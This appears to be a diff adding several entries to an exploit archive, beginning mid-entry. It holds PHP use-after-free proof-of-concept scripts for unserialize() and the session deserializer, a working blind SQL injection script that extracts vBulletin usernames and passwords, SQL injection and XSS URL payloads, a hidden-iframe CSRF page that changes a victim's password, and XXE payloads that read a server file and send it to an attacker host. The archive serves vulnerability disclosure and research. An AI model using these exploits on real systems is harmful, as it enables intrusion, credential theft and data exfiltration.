if (!php_var_unserialize(&pentry, &p, s + buf_len, &var_hash TSRMLS_CC)) {
zval_ptr_dtor(&pentry);
goto outexcept;
}
if(Z_TYPE_P(pentry) != IS_OBJECT) {
goto outexcept;
}
ALLOC_INIT_ZVAL(pinf);
if (*p == ',') { /* new version has inf */
++p;
if (!php_var_unserialize(&pinf, &p, s + buf_len, &var_hash TSRMLS_CC)) {
zval_ptr_dtor(&pinf);
goto outexcept;
}
}
It has been demonstrated many times before that __wakeup() leads to
ZVAL is freed from memory. However during deserialization will still
allow to use R: or r: to set references to that already freed memory.
It is possible to use-after-free attack and execute arbitrary code
remotely.
Proof of Concept Exploit
------------
The PoC works on standard MacOSX 10.11 installation of PHP 5.6.12.
<?php
class obj {
var $ryat;
function __wakeup() {
$this->ryat = 1;
}
}
$fakezval = ptr2str(1122334455);
$fakezval .= ptr2str(0);
$fakezval .= "\x00\x00\x00\x00";
$fakezval .= "\x01";
$fakezval .= "\x00";
$fakezval .= "\x00\x00";
$inner = 'x:i:1;O:8:"stdClass":0:{},i:1;;m:a:0:{}';
$exploit = 'a:5:{i:0;i:1;i:1;C:16:"SplObjectStorage":'.strlen($inner).':{'.$inner.'}i:2;O:3:"obj":1:{s:4:"ryat";R:3;}i:3;R:6;i:4;s:'.strlen($fakezval).':"'.$fakezval.'";}';
$data = unserialize($exploit);
var_dump($data);
function ptr2str($ptr)
{
$out = '';
for ($i = 0; $i < 8; $i++) {
$out .= chr($ptr & 0xff);
$ptr >>= 8;
}
return $out;
}
?>
Test the PoC on the command line:
$ php uafpoc.php
array(5) {
[0]=>
int(1)
[1]=>
&int(1)
[2]=>
object(obj)#3 (1) {
["ryat"]=>
&int(1)
}
[3]=>
int(1122334455) <=== so we can control the memory and create fake ZVAL :)
[4]=>
string(24) "?v?B????"
}

125
platforms/php/dos/38123.txt Executable file
View file

@ -0,0 +1,125 @@
Use After Free Vulnerabilities in Session Deserializer
Taoguang Chen <[@chtg](http://github.com/chtg)>
Write Date: 2015.8.9
Release Date: 2015.9.4
Multiple use-after-free vulnerabilities were discovered in session deserializer (php/php_binary/php_serialize) that can be abused for leaking arbitrary memory blocks or execute arbitrary code remotely.
Affected Versions
------------
Affected is PHP 5.6 < 5.6.13
Affected is PHP 5.5 < 5.5.29
Affected is PHP 5.4 < 5.4.45
Credits
------------
This vulnerability was disclosed by Taoguang Chen.
Description
------------
PS_SERIALIZER_DECODE_FUNC(php) /* {{{ */
{
...
PHP_VAR_UNSERIALIZE_INIT(var_hash);
p = val;
while (p < endptr) {
...
if (has_value) {
ALLOC_INIT_ZVAL(current);
if (php_var_unserialize(&current, (const unsigned char **) &q,
(const unsigned char *) endptr, &var_hash TSRMLS_CC)) {
php_set_session_var(name, namelen, current, &var_hash TSRMLS_CC);
}
zval_ptr_dtor(&current);
}
PS_ADD_VARL(name, namelen);
skip:
efree(name);
p = q;
}
break_outer_loop:
PHP_VAR_UNSERIALIZE_DESTROY(var_hash);
return SUCCESS;
}
When session deserializer (php/php_binary) deserializing multiple data
it will call to php_var_unserialize() multiple times. So we can create
ZVAL and free it via the php_var_unserialize() with a crafted
serialized string, and also free the memory (reduce the reference
count of the ZVAL to zero) via zval_ptr_dtor() with deserialize two
identical session data, then the next call to php_var_unserialize()
will still allow to use R: or r: to set references to that already
freed memory. It is possible to use-after-free attack and execute
arbitrary code remotely.
In some other cases, session deserializer
(php/php_binary/php_serialize) may also lead to use-after-free
vulnerabilities: i) via crafted Serializable::unserialize() ii) via
unserialize()'s callback function and zend_lookup_class() call a
crafted __autoload().
Proof of Concept Exploit
------------
The PoC works on standard MacOSX 10.11 installation of PHP 5.4.44.
<?php
session_start();
$fakezval = ptr2str(1122334455);
$fakezval .= ptr2str(0);
$fakezval .= "\x00\x00\x00\x00";
$fakezval .= "\x01";
$fakezval .= "\x00";
$fakezval .= "\x00\x00";
$exploit = 'ryat|a:2:{i:0;i:1;i:1;a:1:{i:1;chtg|a:1:{i:0;R:4;}';
// $exploit = 'ryat|a:1:{i:0;i:1;}ryat|i:1;chtg|R:1;';
session_decode($exploit);
for ($i = 0; $i < 5; $i++) {
$v[$i] = $fakezval.$i;
}
var_dump($_SESSION);
function ptr2str($ptr)
{
$out = "";
for ($i = 0; $i < 8; $i++) {
$out .= chr($ptr & 0xff);
$ptr >>= 8;
}
return $out;
}
?>
Test the PoC on the command line:
$ php uafpoc.php
array(2) {
["ryat"]=>
NULL
["chtg"]=>
array(1) {
[0]=>
int(1122334455) <=== so we can control the memory and create fake ZVAL :)
}
}

179
platforms/php/dos/38125.txt Executable file
View file

@ -0,0 +1,179 @@
Use After Free Vulnerabilities in unserialize()
Taoguang Chen <[@chtg](http://github.com/chtg)>
Write Date: 2015.7.31
Release Date: 2015.9.4
Multiple use-after-free vulnerabilities were discovered in unserialize() with Serializable class that can be abused for leaking arbitrary memory blocks or execute arbitrary code remotely.
Affected Versions
------------
Affected is PHP 5.6 < 5.6.12
Affected is PHP 5.5 < 5.5.28
Affected is PHP 5.4 < 5.4.44
Credits
------------
This vulnerability was disclosed by Taoguang Chen.
Description
------------
if (ce->unserialize == NULL) {
zend_error(E_WARNING, "Class %s has no unserializer", ZSTR_VAL(ce->name));
object_init_ex(rval, ce);
} else if (ce->unserialize(rval, ce, (const unsigned char*)*p,
datalen, (zend_unserialize_data *)var_hash) != SUCCESS) {
return 0;
}
(*p) += datalen;
return finish_nested_data(UNSERIALIZE_PASSTHRU);
The unserialize() with Serializable class lead to various problems.
i) Free the memory via crafted Serializable class
<?php
class obj implements Serializable {
var $data;
function serialize() {
return serialize($this->data);
}
function unserialize($data) {
$this->data = unserialize($data);
$this->data = 1;
}
}
?>
ii) Free the memory via the process_nested_data() with a invalid
serialized string
static inline int process_nested_data(UNSERIALIZE_PARAMETER, HashTable
*ht, long elements, int objprops)
{
while (elements-- > 0) {
zval *key, *data, **old_data;
...
ALLOC_INIT_ZVAL(data);
if (!php_var_unserialize(&data, p, max, var_hash TSRMLS_CC)) {
zval_dtor(key);
FREE_ZVAL(key);
zval_dtor(data);
FREE_ZVAL(data); <=== free the memory
return 0;
}
iii) Free the memory via the var_push_dtor_no_addref() with the var_destroy().
PHPAPI void var_destroy(php_unserialize_data_t *var_hashx)
{
...
while (var_hash) {
for (i = 0; i < var_hash->used_slots; i++) {
zval_ptr_dtor(&var_hash->data[i]); <=== free the memory
}
...
PHPAPI int php_var_unserialize(UNSERIALIZE_PARAMETER)
{
...
if (*rval != NULL) {
var_push_dtor_no_addref(var_hash, rval);
}
*rval = *rval_ref;
We can create ZVAL and free it via Serializable::unserialize. However
the unserialize() will still allow to use R: or r: to set references
to that already freed memory. It is possible to use-after-free attack
and execute arbitrary code remotely.
Proof of Concept Exploit
------------
The PoC works on standard MacOSX 10.11 installation of PHP 5.4.43.
<?php
$fakezval = ptr2str(1122334455);
$fakezval .= ptr2str(0);
$fakezval .= "\x00\x00\x00\x00";
$fakezval .= "\x01";
$fakezval .= "\x00";
$fakezval .= "\x00\x00";
// i)
//$inner = 'a:1:{i:0;i:1;}';
//$exploit = 'a:2:{i:0;C:3:"obj":'.strlen($inner).':{'.$inner.'}i:1;R:3;}';
// ii)
$inner = 'a:2:{i:0;i:1;i:1;i:2';
$exploit = 'a:2:{i:0;C:3:"obj":'.strlen($inner).':{'.$inner.'}i:1;R:5;}';
// iii)
//$inner = 'r:1;';
//$exploit = 'a:1:{i:0;C:3:"obj":'.strlen($inner).':{'.$inner.'}}';
$data = unserialize($exploit);
for ($i = 0; $i < 5; $i++) {
$v[$i] = $fakezval.$i;
}
var_dump($data);
function ptr2str($ptr)
{
$out = "";
for ($i = 0; $i < 8; $i++) {
$out .= chr($ptr & 0xff);
$ptr >>= 8;
}
return $out;
}
class obj implements Serializable {
var $data;
function serialize() {
return serialize($this->data);
}
function unserialize($data) {
$this->data = unserialize($data);
// i)
// $this->data = '1';
}
}
?>
Test the PoC on the command line:
$ php uafpoc.php
array(2) {
[0]=>
object(obj)#1 (1) {
["data"]=>
bool(false)
}
[1]=>
int(1122334455) <=== so we can control the memory and create fake ZVAL :)
}

23
platforms/php/webapps/38111.txt Executable file
View file

@ -0,0 +1,23 @@
source: http://www.securityfocus.com/bid/56860/info
The Simple Gmail Login plugin for Wordpress is prone to an information-disclosure vulnerability.
Attackers can exploit this issue to obtain sensitive information that may lead to further attacks.
Simple Gmail Login 1.1.3 and prior are vulnerable.
Fatal error: Uncaught exception 'Exception' with message
'DateTimeZone::__construct() [<a
href='datetimezone.--construct'>datetimezone.--construct</a>]: Unknown or bad timezone ()' in
C:\xampp\htdocs\wordpress\wp-content\plugins\simple-gmail-login\simple-gmail-login.php:229
Stack trace: #0
C:\xampp\htdocs\wordpress\wp-content\plugins\simple-gmail-login\simple-gmail-login.php(229):
DateTimeZone->__construct('') #1
C:\xampp\htdocs\wordpress\wp-content\plugins\simple-gmail-login\simple-gmail-login.php(210):
SimpleGmail_Plugin->log('Plugin activate...', false) #2 [internal
function]: SimpleGmail_Plugin->activate('') #3
C:\xampp\htdocs\wordpress\wp-includes\plugin.php(403):
call_user_func_array(Array, Array) #4
C:\xampp\htdocs\wordpress\wp-admin\plugins.php(157):
do_action('activate_simple...') #5 {main} thrown in C:\xampp\htdocs\wordpress\wp-content\plugins\simple-gmail-login\simple-gmail-login.php
on line 229

7
platforms/php/webapps/38112.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/56862/info
FOOT Gestion is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?page=contacter.php&id=-1 union select 1,2--%20

86
platforms/php/webapps/38113.php Executable file
View file

@ -0,0 +1,86 @@
source: http://www.securityfocus.com/bid/56877/info
The ajaxReg module for vBulletin is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
#!/usr/bin/php
<?
# vBulletin 3.x/4.x AjaxReg remote Blind SQL Injection Exploit
# https://www.example.com/-4HcW64E57CI/ULWN9mDnK8I/AAAAAAAAABo/cc0UA9eV_ak/s640/11-26-2012%25206-02-5s3%2520AM.png
# livedemo : http://www.example.com/watch?v=LlKaYyJxH7E
# check it : http://www.example.com/vBulletin/clientscript/register.js
function usage ()
{
echo
"\n[+] vBulletin 3.x/4.x AjaxReg remote Blind SQL Injection Exploit".
"\n[+] Author: Cold z3ro".
"\n[+] Site : http://www.example.com | www.example.com".
"\n[+] vandor: http://www.example.com/forum/showthread.php?t=144869".
"\n[+] Usage : php 0day.php <hostname> <path> [userid] [key]".
"\n[+] Ex. : php 0day.php www.example.com /vBulletin/ 1 abcdefghijklmnopqrstuvwxyz".
"\n[+] Note. : Its a 0day exploit\n\n";
exit ();
}
function check ($hostname, $path, $field, $pos, $usid, $char)
{
$char = ord ($char);
$inj = 'ajax.php?do=CheckUsername&param=';
$inj.=
"admin'+and+ascii(substring((SELECT/**/{$field}/**/from/**/user/**/where/**/userid={$usid}),{$pos},1))={$char}/*";
$culr = $hostname.$path.$inj;
$curl = curl_init();
curl_setopt ($curl, CURLOPT_URL, $culr );
curl_setopt($curl, CURLOPT_HEADER, 1);
curl_setopt($curl, CURLOPT_VERBOSE, 0);
ob_start();
curl_exec ($curl);
curl_close ($curl);
$con = ob_get_contents();
ob_end_clean();
if(eregi('Invalid',$con))
return true;
else
return false;
}
function brutechar ($hostname, $path, $field, $usid, $key)
{
$pos = 1;
$chr = 0;
while ($chr < strlen ($key))
{
if (check ($hostname, $path, $field, $pos, $usid, $key [$chr]))
{
echo $key [$chr];
$chr = -1;
$pos++;
}
$chr++;
}
}
if (count ($argv) != 4)
usage ();
$hostname = $argv [1];
$path = $argv [2];
$usid = $argv [3];
$key = $argv [4];
if (empty ($key))
$key = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
echo "[+] Username: ";
brutechar ($hostname, $path, "username", $usid, $key);
echo "\n[+] Password: ";
brutechar ($hostname, $path, "password", $usid, $key);
echo "\n[+] Done..";
echo "\n[+] It's not fake, its real.";
# word to 1337day.com, stop scaming me
?>

7
platforms/php/webapps/38115.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/56882/info
Simple Invoices is prone to multiple HTML-injection vulnerabilities and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.
[http://]www.example.com/simpleinvoices/index.php?module=invoices&view=manage&having=%3C/script%3E%3Cscript%3Ealert%28%27POC%20XSS%27%29;%3C/script%3E%3Cscript%3E

60
platforms/php/webapps/38119.html Executable file
View file

@ -0,0 +1,60 @@
<!--
# Exploit Title: [Auto-exchanger version 5.1.0 Xsrf]
# Date: [2015/06/05]
# Exploit Author: [Aryan Bayaninejad]
# Linkedin : [https://www.linkedin.com/profile/view?id=276969082]
# Vendor Homepage: [www.auto-exchanger.com]
# Version: [Version 5.1.0]
# Demo : www.farhadexchange.com
# CVE : [CVE-2015-6827]
------------------------------------
details:
------------------------------------
auto-exchanger version 5.1.0 suffers from an xsrf vulnerability , attacker
is able to abuse of this vulnerability to change password by a hidden
iframe in another page.
-------------------------------------
Exploit:
-------------------------------------
-->
<html>
<body>
<iframe style="display:none" name="xsrf-frame"></iframe>
<form method='POST' action='http://farhadexchange.com/signup.php'
target="xsrf-frame" id="xsrf-form">
<label id="lbl_error" name="lbl_error" class="ErrorMessage"></label>
<INPUT type="hidden" name="suser" value="victim_user">
<input type="hidden" name="section" value="do_update" />
<label type='hidden' id="n_password0"><span>
<input type='hidden' maxlength="20" size="30" name="password0"
id="password0" value="testpassword123456" > </label>
<input type="hidden" name="rid" value="" />
<label id="n_password">
<input type="hidden" maxlength="20" size="30" name="password1"
id="password1" value="testpassword123456" ></label>
<label id="n_mail">
<INPUT type='hidden' maxLength=60 size=30 name="mail" id="mail"
value="victim_email" type="text">
</label>
<label id="n_country">
<input type='hidden' name="country" id="country" style="width:196;"
value="IR">
</label>
<label id="cid">
<input type='hidden' name='cid' value='2'/>
</label>
<label id="n_curreny_account">
<INPUT type='hidden' maxLength=60 size=30 name="curreny_account"
id="curreny_account" value="" ><br>
</label>
</form>
<script>document.getElementById("xsrf-form").submit()</script>
</body>
</html>

99
platforms/xml/webapps/38118.txt Executable file
View file

@ -0,0 +1,99 @@
Exploit Title: Qlikview blind XXE security vulnerability
Product: Qlikview
Vulnerable Versions: v11.20 SR11 and previous versions
Tested Version: v11.20 SR4
Advisory Publication: 08/09/2015
Latest Update: 08/09/2015
Vulnerability Type: Improper Restriction of XML External Entity Reference [CWE-611]
CVE Reference: CVE-2015-3623
Credit: Alex Haynes
Advisory Details:
(1) Vendor & Product Description
--------------------------------
Vendor: QLIK
Product & Version:
QlikView v11.20 SR4
Vendor URL & Download:
http://www.qlik.com/us/explore/products/qlikview
Product Description:
"The QlikView Business Discovery platform delivers true self-service BI that empowers business users by driving innovative decision-making."
(2) Vulnerability Details:
--------------------------
The Qlikview platform is vulnerable to XML External Entity (XXE) vulnerabilities. More specifically, the platform
is susceptible to DTD parameter injections, which are also "blind" as the server feeds back no visual response. These vulnerabilities can be exploited
to force Server Side Request Forgeries (SSRF)in multiple protocols, as well as reading and extracting arbitrary files on the server directly.
Proof of concept for XXE [CVE-2015-5361]:
-----------------------------------------
URL: https://<QLIKVIEW>/AccessPoint.aspx
Attack Pattern for SSRF:
------------------------
In POST body:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE update [
<!ENTITY % external SYSTEM "http://yourserver.com">
%external;]>
OR simply
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE roottag PUBLIC "-//WHITE//NINJA//EN" "http://yourserver.com">
As this is a blind XXE, you will see no response from server, but yourserver.com will receive the HTTP request from the Qlikview server. Also works with FTP and HTTPS protocols.
Attack Pattern for reading and extracting arbitrary files:
------------------------------------------
In POST body:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE roottag [
<!ENTITY % remote SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % dtd SYSTEM "http://yourserver.com/test.dtd">
%dtd;
%send;
]]>
The test.dtd file on yourserver.com will need to contain the following:
Test.dtd
--------
<!ENTITY % all "<!ENTITY &#x25; send SYSTEM 'http://yourserver.com/?%remote;'>">
%all;
As the response is blind, you will see no response from the server, but yourserver.com will receive the file contents as part of the URL in lieu of the %remote parameter.
(3) Advisory Timeline:
----------------------
29/04/2015 - First Contact informing vendor of vulnerability
30/04/2015 - Response requesting details of vulnerability. Details sent
05/05/2015 - Vendor indicates issue is under investigation.
06/05/2015 - Vendor confirms vulnerability and has started working on resolving the issue.
20/05/2015 - Vendor confirms root cause has been identified and patch is under internal testing.
08/06/2015 - Vendor confirms patch ready and requests 90 day restraint on vulnerability release to give clients time to patch.
10/06/2015 - Patch 11.20 SR12 released, fixing the vulnerability
08/09/2015 - Public disclosure of vulnerability.
(4)Solution:
------------
Upgrade to QV11.20 SR12 will correct the vulnerability.
(5) Credits:
------------
Discovered by Alex Haynes
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3623
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3623